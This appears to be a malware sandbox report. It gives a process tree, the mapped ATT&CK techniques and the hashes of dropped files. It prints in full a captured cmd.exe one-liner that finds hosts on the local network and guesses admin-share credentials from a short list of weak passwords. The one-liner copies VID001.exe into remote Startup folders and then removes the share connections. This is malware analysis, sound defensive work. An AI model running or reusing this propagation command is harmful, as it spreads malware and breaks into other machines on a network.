C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))4⤵
- Indicator Removal: Network Share Connection Removal
PID:4124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"5⤵
- Network Service Discovery
PID:1608 -
C:\Windows\SysWOW64\net.exenet view6⤵
- Discovers systems in the same network
PID:392
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"6⤵PID:5060
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a6⤵
- Network Service Discovery
PID:2264
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"6⤵PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_5⤵PID:2744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "5⤵PID:1252
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.16⤵
- Discovers systems in the same network
PID:3780
-
-
C:\Windows\SysWOW64\find.exefind /i " "6⤵PID:1000
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3660
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3840
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3968
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4056
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:680
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca1⤵PID:2524
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2424
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Indicator Removal
1Network Share Connection Removal
1Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0E57D07F_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Filesize2.3MB
MD52915b3f8b703eb744fc54c81f4a9c67f
SHA1e10361a11f8a7f232ac3cb2125c1875a0a69a3e4
SHA2569f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
SHA51284e53163c255edde6a0f2289b67166ad8c4f3e2b06e92b7d9dd3d8701a58b4c6f6c661be0c9f0777677bcd36de0a7cccc6512d953c4ba12d8b5c6a35617f3816
-
Filesize
1KB
MD523c2dce8ae3f59a7bb93cb25f32b68df
SHA15a415e7b7309b7195977ea3277d712641129a2f7
SHA256a4258cde2a37e3d68440bc2613fa8151eda7769c1a1e0f0cd5e2967f5cd4d187
SHA512c1da2f2d4aee9fdc1f5a4d3cd793784102a8380fc0db4c15474a03f849eecfb1e491ddfa37074d59ebdfc3117b7c3e6585fd8747e85ae547eeef62ec8c689ca9
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
2.3MB
MD5921379bd587ab29da4dc23fb9d47fe36
SHA1e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA25650cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA51290211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
-
Filesize
257B
MD53480d14e211f8df14470452e243b6fd6
SHA15a48c27530713c3355c9282fa248e2fb707ca8ea
SHA256663f6e40cb6f1ac462c8ceb65d088f2b91021124e5dc6806975d48c89a31d74a
SHA512add0f9f080534332c54e903f751399d8358fdd61fdbd7e5f63795f90404f9e249f7477447240f801844d3b12fdfe3fa5cb721300d5af2f6f0f4752764cff2b1c
-
Filesize
100KB
MD5876352601347415b257562c1a1814747
SHA17a2efaec1f5cd7237cf7337b85bb93b7aa61fd11
SHA2564433ac7f3fd183495db06275d4885fd8e1462fe542fcc2c9681e95d3e7ceddde
SHA51206c798212aeb0d300701bb792bb71e0d921629995a4de500605cf879a9c93c6b77a2663b4795b846676a354c1eddc23bc341723080cfdaca1c35b3d7c47616a2